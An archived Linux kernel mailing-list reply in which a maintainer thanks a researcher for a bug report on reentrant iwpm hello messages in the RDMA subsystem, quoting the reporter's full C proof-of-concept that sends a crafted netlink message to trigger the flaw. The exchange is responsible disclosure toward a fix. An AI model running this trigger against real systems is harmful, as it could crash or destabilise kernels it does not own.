From: Leon Romanovsky <leon@kernel.org>
To: Lin Ma <linma@zju.edu.cn>
Cc: jgg@ziepe.ca, cmeiohas@nvidia.com, michaelgur@nvidia.com,
linux-rdma@vger.kernel.org, linux-kernel@vger.kernel.org
Subject: Re: [bug report] RDMA/iwpm: reentrant iwpm hello message
Date: Mon, 30 Dec 2024 20:28:28 +0200 [thread overview]
Message-ID: <20241230182828.GA81460@unreal> (raw)
In-Reply-To: <24cc4fc5.f216.193fb898b6c.Coremail.linma@zju.edu.cn>
On Wed, Dec 25, 2024 at 09:58:35AM +0800, Lin Ma wrote:
>
> >
> > Do you have reproducer for that?
> >
>
> Yep, I attached the PoC code, please enable CONFIG_INFINIBAND
> for testing.
Thanks a lot for the repro. I wonder why iWARP folks never complained
about it, Anyway I have local fix, but need to test it before sending,
will do after New Year holidays.
Thanks again.
>
> Thanks
> By the way, Merry Christmas~
>
> // gcc poc.c -static -o poc.elf -lmnl
> #include <stdio.h>
> #include <stdlib.h>
> #include <stdint.h>
> #include <string.h>
> #include <stdbool.h>
>
> #include <libmnl/libmnl.h>
>
> #define PAGE_SIZE 0x1000
> #define RDMA_NL_GET_CLIENT(type) ((type & (((1 << 6) - 1) << 10)) >> 10)
> #define RDMA_NL_GET_OP(type) (type & ((1 << 10) - 1))
> #define RDMA_NL_GET_TYPE(client, op) ((client << 10) + op)
> #define RDMA_NL_IWCM (2)
> #define IWPM_NLA_HELLO_ABI_VERSION (1)
>
> enum
> {
> RDMA_NL_IWPM_REG_PID = 0,
> RDMA_NL_IWPM_ADD_MAPPING,
> RDMA_NL_IWPM_QUERY_MAPPING,
> RDMA_NL_IWPM_REMOVE_MAPPING,
> RDMA_NL_IWPM_REMOTE_INFO,
> RDMA_NL_IWPM_HANDLE_ERR,
> RDMA_NL_IWPM_MAPINFO,
> RDMA_NL_IWPM_MAPINFO_NUM,
> RDMA_NL_IWPM_HELLO,
> RDMA_NL_IWPM_NUM_OPS
> };
>
> int main(int argc, char const *argv[])
> {
> struct mnl_socket *sock;
> struct nlmsghdr *nlh;
> char buf[PAGE_SIZE];
> int err;
>
> sock = mnl_socket_open(NETLINK_RDMA);
> if (sock == NULL)
> {
> perror("mnl_socket_open");
> exit(-1);
> }
>
> nlh = mnl_nlmsg_put_header(buf);
> nlh->nlmsg_type = RDMA_NL_GET_TYPE(RDMA_NL_IWCM, RDMA_NL_IWPM_HELLO);
> nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
> nlh->nlmsg_seq = 1;
> nlh->nlmsg_pid = 0;
>
> // static const struct nla_policy hello_policy[IWPM_NLA_HELLO_MAX] = {
> // [IWPM_NLA_HELLO_ABI_VERSION] = { .type = NLA_U16 }
> // };
> mnl_attr_put_u16(nlh, IWPM_NLA_HELLO_ABI_VERSION, 3);
>
> err = mnl_socket_sendto(sock, buf, nlh->nlmsg_len);
> if (err < 0)
> {
> perror("mnl_socket_sendto");
> exit(-1);
> }
> return 0;
> }
next prev parent reply other threads:[~2024-12-30 18:28 UTC|newest]
Thread overview: 9+ messages / expand[flat|nested] mbox.gz Atom feed top
2024-12-20 15:32 [bug report] RDMA/iwpm: reentrant iwpm hello message Lin Ma
2024-12-24 9:29 ` Leon Romanovsky
2024-12-24 10:51 ` Lin Ma
2024-12-24 14:11 ` Leon Romanovsky
2024-12-24 16:16 ` Lin Ma
2024-12-24 19:26 ` Leon Romanovsky
2024-12-25 1:58 ` Lin Ma
2024-12-30 18:28 ` Leon Romanovsky [this message]
2025-01-08 15:14 ` Leon Romanovsky
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20241230182828.GA81460@unreal \
--to=leon@kernel.org \
--cc=cmeiohas@nvidia.com \
--cc=jgg@ziepe.ca \
--cc=linma@zju.edu.cn \
--cc=linux-kernel@vger.kernel.org \
--cc=linux-rdma@vger.kernel.org \
--cc=michaelgur@nvidia.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.